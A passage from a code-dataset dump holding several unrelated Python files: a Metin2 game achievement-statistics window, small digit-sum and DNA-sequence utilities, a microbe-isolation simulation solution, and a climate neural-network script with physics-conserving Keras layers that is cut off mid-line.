1)\n\t\tself.BossButtonDown.Show()\n\t\t\n\t\tself.MetinButtonUp = ui.Button()\n\t\tself.MetinButtonUp.SetParent(self.Board)\n\t\tself.MetinButtonUp.SetPosition(95,33)\n\t\tself.MetinButtonUp.SetText(\"\")\n\t\tself.MetinButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.MetinButtonUp.SetOverVisual(\"d:/ymir 
work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.MetinButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 2)\n\t\tself.MetinButtonUp.Show()\t\n\t\t\n\t\tself.MetinButtonDown = ui.Button()\n\t\tself.MetinButtonDown.SetParent(self.Board)\n\t\tself.MetinButtonDown.SetPosition(95,33)\n\t\tself.MetinButtonDown.SetText(\"\")\n\t\tself.MetinButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 2)\n\t\tself.MetinButtonDown.Hide()\n\t\t\n\t\tself.DungeonsButtonUp = ui.Button()\n\t\tself.DungeonsButtonUp.SetParent(self.Board)\n\t\tself.DungeonsButtonUp.SetPosition(174,33)\n\t\tself.DungeonsButtonUp.SetText(\"\")\n\t\tself.DungeonsButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.DungeonsButtonUp.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.DungeonsButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 3)\n\t\tself.DungeonsButtonUp.Show()\t\n\t\t\n\t\tself.DungeonsButtonDown = ui.Button()\n\t\tself.DungeonsButtonDown.SetParent(self.Board)\n\t\tself.DungeonsButtonDown.SetPosition(174,33)\n\t\tself.DungeonsButtonDown.SetText(\"\")\n\t\tself.DungeonsButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 3)\n\t\tself.DungeonsButtonDown.Hide()\n\n\t\tself.scrollbar = ui.ScrollBar()\n\t\tself.scrollbar.SetParent(self.Board)\n\t\tself.scrollbar.SetScrollBarSize(340)\n\t\tself.scrollbar.SetPosition(255, 55)\t\n\t\tself.scrollbar.SetMiddleBarSize(float(5) / float(7))\n\t\tself.scrollbar.SetScrollEvent(self.__OnScroll)\n\t\tself.scrollbar.Hide()\n\t\t\n\t\tself.ButtonTextLines = ui.TextLine()\n\t\tself.ButtonTextLines.SetParent(self.Board)\n\t\tself.ButtonTextLines.SetPosition(30,36)\n\t\tself.ButtonTextLines.SetText(\" Bosse Metins Dungeons\")\n\t\tself.ButtonTextLines.Show()\t\n\n\t\tself.SplitTitleBar = ui.HorizontalBar()\n\t\tself.SplitTitleBar.SetParent(self.Board)\n\t\tself.SplitTitleBar.Create(235)\n\t\tself.SplitTitleBar.SetPosition(16,55)\n\t\tself.SplitTitleBar.Show()\n\t\t\n\t\tself.AchievementError = ui.TextLine()\n\t\tself.AchievementError.SetParent(self.Board)\n\t\tself.AchievementError.SetPosition(133,80)\n\t\tself.AchievementError.SetFontColor(0.9607, 0.2392, 0.0)\n\t\tself.AchievementError.SetText(\"Es wurden keine Achievements gefunden!\")\n\t\tself.AchievementError.SetHorizontalAlignCenter()\n\t\tself.AchievementError.Hide()\n\n\t\t\t\n\t\ti = 0\n\t\theight = 75\n\t\tmax_box = 5\n\t\t\n\t\twhile i < max_box:\n\t\t\n\t\t\tself.faceBoxIMG[i] = ui.ImageBox()\n\t\t\tself.faceBoxIMG[i].SetParent(self.Board)\n\t\t\tself.faceBoxIMG[i].SetPosition(17,height)\n\t\t\tself.faceBoxIMG[i].LoadImage(\"d:/ymir work/ui/game/windows/box_face.sub\")\n\t\t\tself.faceBoxIMG[i].Show()\n\n\t\t\t\n\t\t\tself.DescThinBoard[i] = 
ui.ThinBoard()\n\t\t\tself.DescThinBoard[i].SetParent(self.Board)\n\t\t\tself.DescThinBoard[i].SetPosition(70,height)\n\t\t\tself.DescThinBoard[i].SetSize(180,60)\n\t\t\tself.DescThinBoard[i].Show()\n\t\t\t\n\t\t\tself.AchievementTitle[i] = ui.TextLine()\n\t\t\tself.AchievementTitle[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementTitle[i].SetPosition(90,5)\n\t\t\tself.AchievementTitle[i].SetFontColor(0.9607, 0.2392, 0.0)\n\t\t\tself.AchievementTitle[i].SetText(\"Metin des Kummers\")\n\t\t\tself.AchievementTitle[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementTitle[i].Show()\n\t\t\t\n\t\t\tself.AchievementText[i] = ui.TextLine()\n\t\t\tself.AchievementText[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementText[i].SetPosition(90,20)\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: 30.000 | Punkte: 10\")\n\t\t\tself.AchievementText[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementText[i].Show()\t\n\t\t\t\n\t\t\tself.AchievementCalcPoints[i] = ui.TextLine()\n\t\t\tself.AchievementCalcPoints[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementCalcPoints[i].SetPosition(90,35)\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: 13.400.032\")\n\t\t\tself.AchievementCalcPoints[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementCalcPoints[i].Show()\t\t\t\n\n\t\t\theight = height + 65\n\t\t\ti = i + 1\n\t\t\n\t\tself.cat = 1\n\t\tself.ClearBoards()\n\t\tself.LoadCategory()\n\t\t\n\tdef LoadCategory(self):\n\t\tself.ClearBoards()\n\t\t\n\t\tif len(settinginfo.Achievement_Statistic[self.cat]) == 0:\n\t\t\t\n\t\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"NoAchievements: \" + str(self.cat) + \" Count: \" + str(len(settinginfo.Achievement_Statistic[self.cat])))\n\t\t\n\t\t\tself.Board.SetSize(266, 415) \n\t\t\tself.scrollbar.Hide()\n\t\t\tself.AchievementError.Show()\n\t\t\treturn\n\t\t\t\n\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"StartListing\")\n\t\tfor i in xrange(min(len(settinginfo.Achievement_Statistic[self.cat]),5)):\n\t\t\tcmd = settinginfo.Achievement_Statistic[self.cat][i].split(\"#\")\n\n\t\t\tself.AchievementTitle[i].SetText(self.GetAchievementName(int(cmd[0])))\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: \" + constInfo.NumberToPointString(int(cmd[1])) + \" | Punkte: \" + constInfo.NumberToPointString(int(cmd[2])))\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: \" + constInfo.NumberToPointString(int(cmd[3])))\n\n\t\t\tself.faceBoxIMG[i].Show()\n\t\t\tself.DescThinBoard[i].Show()\t\n\n\t\tif len(settinginfo.Achievement_Statistic[self.cat]) > 5:\n\t\t\tself.Board.SetSize(285, 415) \n\t\t\tself.scrollbar.SetPos(0)\n\t\t\tself.scrollbar.SetMiddleBarSize(float(5) / float(len(settinginfo.Achievement_Statistic[self.cat])))\n\t\t\tself.scrollbar.Show()\t\n\t\telse:\n\t\t\tself.Board.SetSize(266, 415) \n\t\t\tself.scrollbar.Hide()\t\t\t\n\t\t\n\t\tself.AchievementError.Hide()\n\t\t\n\tdef GetAchievementName(self,index):\n\t\tif index in settinginfo.Achievement_Names:\n\t\t\treturn settinginfo.Achievement_Names[index]\n\t\telse:\n\t\t\treturn str(index)\t\t\n\t\t\n\tdef __OnScroll(self):\n\t\tpos = int(self.scrollbar.GetPos() * (len(settinginfo.Achievement_Statistic[self.cat]) - 5)) ##Aktuelle Position der Scrollbar\n\t\t#self.Board.SetTitleName(\"Achievement-Statistik (Pos: \" + str(pos) + \")\")\n\t\tfor i in xrange(5):\n\t\t\trealPos = i + pos\n\t\t\t\n\t\t\tcmd = 
settinginfo.Achievement_Statistic[self.cat][realPos].split(\"#\")\n\n\t\t\tself.AchievementTitle[i].SetText(self.GetAchievementName(int(cmd[0])))\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: \" + constInfo.NumberToPointString(int(cmd[1])) + \" | Punkte: \" + constInfo.NumberToPointString(int(cmd[2])))\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: \" + constInfo.NumberToPointString(int(cmd[3])))\n\t\t\ttry:\n\t\t\t\tself.faceBoxIMG[i].LoadImage(\"images_achievement/\" + str(cmd[0]) + \".tga\")\n\t\t\texcept:\n\t\t\t\tself.faceBoxIMG[i].LoadImage(\"images_achievement/unknown.tga\")\n\n\tdef ClearBoards(self):\n\t\ti = 0\n\t\tmax_box = 5\n\t\twhile i < max_box:\n\t\t\tself.faceBoxIMG[i].Hide()\n\t\t\tself.DescThinBoard[i].Hide()\n\t\t\ti = i + 1\n\t\n\tdef ChangeActionMode(self,idx):\n\t\tif self.cat == idx:\n\t\t\treturn\n\t\t\t\n\t\tif idx == 1:\n\t\t\tself.BossButtonUp.Hide()\n\t\t\tself.BossButtonDown.Show()\n\t\t\t\n\t\t\tself.MetinButtonUp.Show()\n\t\t\tself.MetinButtonDown.Hide()\n\n\t\t\tself.DungeonsButtonUp.Show()\n\t\t\tself.DungeonsButtonDown.Hide()\t\t\t\n\t\t\t\n\n\t\telif idx == 2:\n\t\t\tself.BossButtonUp.Show()\n\t\t\tself.BossButtonDown.Hide()\n\t\t\t\n\t\t\tself.MetinButtonUp.Hide()\n\t\t\tself.MetinButtonDown.Show()\n\n\t\t\tself.DungeonsButtonUp.Show()\n\t\t\tself.DungeonsButtonDown.Hide()\t\t\t\n\t\t\n\t\telif idx == 3:\n\t\t\tself.BossButtonUp.Show()\n\t\t\tself.BossButtonDown.Hide()\n\t\t\t\n\t\t\tself.MetinButtonUp.Show()\n\t\t\tself.MetinButtonDown.Hide()\n\n\t\t\tself.DungeonsButtonUp.Hide()\n\t\t\tself.DungeonsButtonDown.Show()\t\t\t\n\t\t\n\t\tself.cat = idx\n\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"ChangeActionMode: \" + str(self.cat))\n\t\tself.LoadCategory()\n\t\n\tdef OnPressEscapeKey(self):\n\t\tself.__del__()\n\t\treturn TRUE\n\n\tdef OnPressExitKey(self):\t\t\n\t\tself.__del__()\n\t\treturn TRUE\t\t\t\n#AchievementStatisticBoard().Show()","sub_path":"root/old_stuff/locutosachievementstat.py","file_name":"locutosachievementstat.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"205581292","text":"# Debug function getSumOfDigits that takes positive integer to calculate sum of it's digits.\n# Assume that argument is an integer.\n\ndef get_sum_of_digits(num) : \n sum = 0\n digits = list(str(num))\n for x in digits:\n sum = sum + int(x)\n return sum\n\nprint(get_sum_of_digits(1337))\n","sub_path":"kyu7-3.py","file_name":"kyu7-3.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"224479121","text":"'''\nCreated on Feb 5, 2018\n\n@author: mmp\n'''\nDNA_BASES = ['A', 'C', 'T', 'G', 'U']\n\ndef reverse(sequence):\n\treturn sequence[::-1]\n\t\ndef complement(sequence):\n\tsz_return = ''\n\tfor base in sequence:\n\t\tif (base == 'A' or base == 'a'): sz_return += 'T'\n\t\telif (base == 'C' or base == 'c'): sz_return += 'G'\n\t\telif (base == 'G' or base == 'g'): sz_return += 'C'\n\t\telif (base == 'T' or base == 't' or base == 'U' or base == 'u'): sz_return += 'A'\n\t\telse: sz_return += base\n\treturn sz_return\n\t\ndef clean_fasta(sequence):\n\t\"\"\"\n\tclean fasta, remove all letters unless ACTG\n\t\"\"\"\n\tseq_return = \"\"\n\tfor i in sequence:\n\t\tif i.upper() in DNA_BASES:\n\t\t\tseq_return += i.upper()\n\treturn seq_return\n\nif __name__ == \"__main__\":\n\tseq = 'accatatatagasfwefwgaggagattgq'\n\tseq_cleaned = 
clean_fasta(seq)\n\tprint(seq_cleaned)\n\n\tprint('reverse:', reverse(seq_cleaned))\t\n\tprint('reverse complement:', complement(reverse(seq_cleaned)))\n\tprint('original reverse complement:', complement(reverse(seq)))\n\t\n\t### count dna bases\n\tprint('Count bases')\n\tfor base in DNA_BASES:\n\t\tprint('{} -> {}'.format(base, seq_cleaned.count(base)))\n\n","sub_path":"day_3/second_module.py","file_name":"second_module.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417764056","text":"\"\"\"\nTask 4. Variant 2.\n\nWrite a program that prints the name under which\nMikhail Evgrafovich Saltykov (Михаил Евграфович Салтыков) hid.\nAdditionally, print the person's field of interest,\nplace of birth, and years of birth and death (if the person has died),\nand compute the age at the present moment (or at the moment of death).\nAll required data must be stored in variables.\nAfter printing the information the program must wait\nuntil the user presses Enter to exit.\n\nALEKSEEV N.S.\n24 september 2018\n\"\"\"\n\n\nnicname = \"Н. Щедрин\"\na = \"прозаик\"\nhome = \"село Спас-Угол, Калязинский уезд, Тверская губерния\"\nlife_deth = \"1826-1889\"\nlife = 1826\ndeth = 1889\n\nprint(\"Михаил Евграфович Салтыков -\", nicname, a, \"родился -\", home)\nprint(\"Годы жизни -\", life_deth)\nprint(\"Возраст -\", deth - life)\n\ninput(\"\\n\\nДля выхода нажмите Enter\")\n","sub_path":"python/homework/task_4_2.py","file_name":"task_4_2.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248505642","text":"import sys\nsys.stdin = open(\"미생물 격리_input.txt\")\n\ndef iswall(y, x):\n    if y == 0 or x == 0 or y == N-1 or x == N-1:\n        return True\n    return False\n\nT = int(input())\nfor tc in range(1, T+1):\n    N, M, K = map(int, input().split())\n    table = [list(map(int, input().split())) for i in range(K)]\n\n    coordinate = []\n    status = []\n    for i in range(K):\n        coordinate.append(table[i][:2])\n        status.append(table[i][2:4])\n    # print(coordinate)\n    # print(status)\n\n    t = 0\n    while True:\n\n        if t == M:\n            result = 0\n            for i in range(len(status)):\n                result += status[i][0]\n            print(\"#{} {}\".format(tc, result))\n            break\n\n        # one hour passes: move every cluster one cell in its direction\n        t += 1\n        for i in range(len(coordinate)):\n            if status[i][1] == 1:\n                coordinate[i][0] -= 1\n            elif status[i][1] == 2:\n                coordinate[i][0] += 1\n            elif status[i][1] == 3:\n                coordinate[i][1] -= 1\n            elif status[i][1] == 4:\n                coordinate[i][1] += 1\n\n        # if a cluster lands on a border cell, halve it and reverse its direction\n        b = [0, 2, 1, 4, 3]  # direction flip table: 1<->2, 3<->4\n        for i in range(len(coordinate)):\n            if iswall(coordinate[i][0], coordinate[i][1]):\n                status[i][0] = status[i][0] // 2\n                status[i][1] = b[status[i][1]]\n\n        # merge clusters that occupy the same cell\n        duplicate = []\n        new_coordinate = []\n        new_status = []\n        for i in range(len(coordinate)):\n            if status[i][0] != 0:\n                # if coordinate[i] not in new_coordinate:\n                #     new_coordinate.append(coordinate[i])\n                #     new_status.append(status[i])\n                # else:\n                #     duplicate.append(coordinate[i])\n\n                if coordinate.count(coordinate[i]) > 1:\n                    if coordinate[i] not in duplicate:\n                        duplicate.append(coordinate[i])\n                else:\n                    new_coordinate.append(coordinate[i])\n                    new_status.append(status[i])\n\n        for i in range(len(duplicate)):\n            sum_counts = 0\n            max_counts = 0\n            for j in range(len(coordinate)):\n                if duplicate[i] == coordinate[j]:\n                    if status[j][0] > max_counts:\n                        max_counts = status[j][0]\n                        direction = status[j][1]\n                    sum_counts += status[j][0]\n\n            
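# Worked example of the merge rule (numbers are illustrative, not taken\n            # from any input): clusters [10, dir=1], [7, dir=3] and [3, dir=2] on one\n            # cell merge into [20, dir=1]: counts are summed and the direction comes\n            # from the largest cluster; since the comparison above uses '>', ties\n            # keep the first cluster encountered.\n            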
new_coordinate.append(duplicate[i])\n new_status.append([sum_counts, direction])\n\n coordinate = new_coordinate\n status = new_status\n\n\n\n\n\n\n\n\n\n\n","sub_path":"algorithm/SW 역량테스트 준비/삼성 신입 모의 SW 역량테스트 문제/미생물 격리.py","file_name":"미생물 격리.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"237352727","text":"from cbrain.imports import *\nfrom cbrain.data_generator import *\nfrom cbrain.cam_constants import *\nfrom cbrain.losses import *\nfrom cbrain.utils import limit_mem\nfrom cbrain.layers import *\nimport tensorflow as tf\nimport tensorflow.math as tfm\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import *\nimport xarray as xr\nimport numpy as np\nfrom cbrain.model_diagnostics import ModelDiagnostics\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\nTRAINDIR = '/local/Tom.Beucler/SPCAM_PHYS/'\nDATADIR = '/project/meteo/w2w/A6/S.Rasp/SP-CAM/fluxbypass_aqua/'\nPREFIX = '8col009_01_'\n\nPREFIXDS = PREFIX\nos.chdir('/filer/z-sv-pool12c/t/Tom.Beucler/SPCAM/CBRAIN-CAM')\n\nclass MassConsLayer_choice(Layer):\n def __init__(self, inp_sub, inp_div, norm_q, hyai, hybi, lvl_choice, **kwargs):\n \"\"\"\n Call using ([input, output])\n Assumes\n prior: [PHQ_nores, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Returns\n post(erior): [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Added lvl_choice, a hyper-parameter to choose the level of mass conservation [0-29]\n \"\"\"\n self.inp_sub, self.inp_div, self.norm_q, self.hyai, self.hybi = \\\n np.array(inp_sub), np.array(inp_div), np.array(norm_q), np.array(hyai), np.array(hybi)\n self.lvl_choice = np.int32(lvl_choice)\n # Define variable indices here\n # Input\n self.PS_idx = 300\n self.LHFLX_idx = 303\n # Output\n self.PHQbef_idx = slice(0, self.lvl_choice) # Indices before the residual\n self.PHCLDLIQ_idx = slice(29, 59)\n self.PHCLDICE_idx = slice(59, 89)\n self.PRECT_idx = 212\n self.PRECTEND_idx = 213\n\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n super().build(input_shape)\n\n def get_config(self):\n config = {'inp_sub': list(self.inp_sub), 'inp_div': list(self.inp_div),\n 'norm_q': list(self.norm_q), 'hyai': list(self.hyai),\n 'hybi': list(self.hybi), 'lvl_choice':self.lvl_choice}\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def call(self, arrs):\n inp, prior = arrs\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(\n inp[:, self.PS_idx],\n self.inp_div[self.PS_idx], self.inp_sub[self.PS_idx],\n self.norm_q, self.hyai, self.hybi\n )\n\n # 2. Compute vertical cloud water integral\n CLDINT = K.sum(dP_tilde *\n (prior[:, self.PHCLDLIQ_idx] + prior[:, self.PHCLDICE_idx]),\n axis=1)\n\n # 3. Compute water vapor integral minus the water vapor residual\n # Careful with handling the pressure vector since it is not aligned\n # with the prior water vapor vector\n VAPINT = K.sum(dP_tilde[:, self.PHQbef_idx] * prior[:, self.PHQbef_idx], 1) +\\\n K.sum(dP_tilde[:, self.lvl_choice+1:30] * prior[:, self.lvl_choice:29], 1)\n\n # 4. Compute forcing (see Tom's note for details, I am just copying)\n LHFLX = (inp[:, self.LHFLX_idx] * self.inp_div[self.LHFLX_idx] +\n self.inp_sub[self.LHFLX_idx])\n PREC = prior[:, self.PRECT_idx] + prior[:, self.PRECTEND_idx]\n\n # 5. 
Compute water vapor tendency at level lvl_choice as residual\n PHQ_LVL = (LHFLX - PREC - CLDINT - VAPINT) / dP_tilde[:, self.lvl_choice]\n\n # 6. Concatenate output vector\n post = tf.concat([\n prior[:, self.PHQbef_idx], PHQ_LVL[:, None],\n prior[:, self.lvl_choice:]\n ], axis=1)\n return post\n\n def compute_output_shape(self, input_shape):\n \"\"\"Input shape + 1\"\"\"\n return (input_shape[0][0], input_shape[0][1] + 1)\n \nclass EntConsLayer_choice(Layer):\n def __init__(self, inp_sub, inp_div, norm_q, hyai, hybi, lvl_choice, **kwargs):\n \"\"\"\n Call using ([input, output])\n Assumes\n prior: [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Returns\n post(erior): [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n \"\"\"\n self.inp_sub, self.inp_div, self.norm_q, self.hyai, self.hybi = \\\n np.array(inp_sub), np.array(inp_div), np.array(norm_q), np.array(hyai), np.array(hybi)\n self.lvl_choice = np.int32(lvl_choice)\n # Define variable indices here\n # Input\n self.PS_idx = 300\n self.SHFLX_idx = 302\n self.LHFLX_idx = 303\n\n # Output\n self.PHQ_idx = slice(0, 30)\n self.PHCLDLIQ_idx = slice(30, 60)\n self.Tbef_idx = slice(90, 90+self.lvl_choice)\n self.DTVKE_idx = slice(179, 209)\n self.FSNT_idx = 209\n self.FSNS_idx = 210\n self.FLNT_idx = 211\n self.FLNS_idx = 212\n self.PRECT_idx = 213\n self.PRECTEND_idx = 214\n self.PRECST_idx = 215\n self.PRECSTEND_idx = 216\n\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n super().build(input_shape)\n\n def get_config(self):\n config = {'inp_sub': list(self.inp_sub), 'inp_div': list(self.inp_div),\n 'norm_q': list(self.norm_q), 'hyai': list(self.hyai),\n 'hybi': list(self.hybi), 'lvl_choice': self.lvl_choice}\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def call(self, arrs):\n inp, prior = arrs\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(\n inp[:, self.PS_idx],\n self.inp_div[self.PS_idx], self.inp_sub[self.PS_idx],\n self.norm_q, self.hyai, self.hybi\n )\n\n # 2. Compute net energy input from phase change and precipitation\n PHAS = L_I / L_V * (\n (prior[:, self.PRECST_idx] + prior[:, self.PRECSTEND_idx]) -\n (prior[:, self.PRECT_idx] + prior[:, self.PRECTEND_idx])\n )\n\n # 3. Compute net energy input from radiation, SHFLX and TKE\n RAD = (prior[:, self.FSNT_idx] - prior[:, self.FSNS_idx] -\n prior[:, self.FLNT_idx] + prior[:, self.FLNS_idx])\n SHFLX = (inp[:, self.SHFLX_idx] * self.inp_div[self.SHFLX_idx] +\n self.inp_sub[self.SHFLX_idx])\n KEDINT = K.sum(dP_tilde * prior[:, self.DTVKE_idx], 1)\n\n # 4. Compute tendency of vapor due to phase change\n LHFLX = (inp[:, self.LHFLX_idx] * self.inp_div[self.LHFLX_idx] +\n self.inp_sub[self.LHFLX_idx])\n VAPINT = K.sum(dP_tilde * prior[:, self.PHQ_idx], 1)\n SPDQINT = (VAPINT - LHFLX) * L_S / L_V\n\n # 5. Same for cloud liquid water tendency\n SPDQCINT = K.sum(dP_tilde * prior[:, self.PHCLDLIQ_idx], 1) * L_I / L_V\n\n # 6. And the same for T but remember residual is still missing\n DTINT = K.sum(dP_tilde[:, :self.lvl_choice] *\\\n prior[:, self.Tbef_idx], 1) +\\\n K.sum(dP_tilde[:, self.lvl_choice+1:30] *\\\n prior[:, 90+self.lvl_choice:119], 1)\n\n # 7. Compute DT30 as residual\n DT_LVL = (\n PHAS + RAD + SHFLX + KEDINT - SPDQINT - SPDQCINT - DTINT\n ) / dP_tilde[:, self.lvl_choice]\n\n # 8. 
Concatenate output vector\n post = tf.concat([\n prior[:, :(90+self.lvl_choice)], DT_LVL[:, None], \\\n prior[:, (90+self.lvl_choice):]\n ], axis=1)\n return post\n\n def compute_output_shape(self, input_shape):\n \"\"\"Input shape + 1\"\"\"\n return (input_shape[0][0], input_shape[0][1] + 1)\n \nscale_dict = load_pickle('./nn_config/scale_dicts/009_Wm2_scaling.pkl')\nin_vars = load_pickle('./nn_config/scale_dicts/009_Wm2_in_vars.pkl')\nout_vars = load_pickle('./nn_config/scale_dicts/009_Wm2_out_vars.pkl')\ndP = load_pickle('./nn_config/scale_dicts/009_Wm2_dP.pkl')\n\n# Define levels to calculate as residuals\nmlev = 14\nelev = 14\n\nmultiplier = 1\nscale_dict_mult = scale_dict\nscale_dict_mult['PHQ'][mlev] *= multiplier\nscale_dict_mult['TPHYSTND'][elev] *= multiplier\n\ntrain_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIXDS+'train_shuffle.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=True\n)\nvalid_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=False\n)\ntest_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIX+'test.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=False\n)\n\nclass Weighted_Loss():\n def __init__(self, lev1, lev2, multiplier, name='weighted_loss',**kwargs):\n self.lev1 = lev1\n self.lev2 = lev2\n self.multiplier = multiplier\n self.__name__ = name\n super().__init__(**kwargs)\n def __call__(self,ytrue,ypred):\n # Multiply two levels of y_pred by multiplier\n ypred_mult = tf.concat([\n ypred[:,:self.lev1],\n tf.expand_dims(self.multiplier*ypred[:,self.lev1],axis=1),\n ypred[:,self.lev1:self.lev2],\n tf.expand_dims(self.multiplier*ypred[:,self.lev2],axis=1),\n ypred[:,self.lev2:]\n ], axis=1)\n # Multiply two levels of y_truth by multiplier\n ytrue_mult = tf.concat([\n ytrue[:,:self.lev1],\n tf.expand_dims(self.multiplier*ytrue[:,self.lev1],axis=1),\n ytrue[:,self.lev1:self.lev2],\n tf.expand_dims(self.multiplier*ytrue[:,self.lev2],axis=1),\n ytrue[:,self.lev2:]\n ], axis=1)\n return (ypred_mult-ytrue_mult)**2\n \ndef Conserving_Model(maslevel,entlevel):\n inpC = Input(shape=(304,))\n densout = Dense(512, activation='linear')(inpC)\n densout = LeakyReLU(alpha=0.3)(densout)\n for i in range (4):\n densout = Dense(512, activation='linear')(densout)\n densout = LeakyReLU(alpha=0.3)(densout)\n densout = Dense(214, activation='linear')(densout)\n densout = LeakyReLU(alpha=0.3)(densout)\n surfout = SurRadLayer(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\n )([inpC, densout])\n massout = MassConsLayer_choice(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\\\n , lvl_choice=maslevel\n )([inpC, surfout])\n enthout = EntConsLayer_choice(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\\\n , lvl_choice=entlevel\n )([inpC, massout])\n return tf.keras.models.Model(inpC, enthout)\n\ndef 
mass_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n # Input\n PS_idx = 300\n LHFLX_idx = 303\n\n # Output\n PHQ_idx = slice(0, 30)\n PHCLDLIQ_idx = slice(30, 60)\n PHCLDICE_idx = slice(60, 90)\n PRECT_idx = 214\n PRECTEND_idx = 215\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute water integral\n WATINT = np.sum(dP_tilde *(pred[:, PHQ_idx] + pred[:, PHCLDLIQ_idx] + pred[:, PHCLDICE_idx]), axis=1)\n# print('PHQ',np.mean(np.sum(dP_tilde*pred[:,PHQ_idx],axis=1)))\n# print('PHCLQ',np.mean(np.sum(dP_tilde*pred[:,PHCLDLIQ_idx],axis=1)))\n# print('PHICE',np.mean(np.sum(dP_tilde*pred[:,PHCLDICE_idx],axis=1)))\n\n # 3. Compute latent heat flux and precipitation forcings\n LHFLX = inp[:, LHFLX_idx] * inp_div[LHFLX_idx] + inp_sub[LHFLX_idx]\n PREC = pred[:, 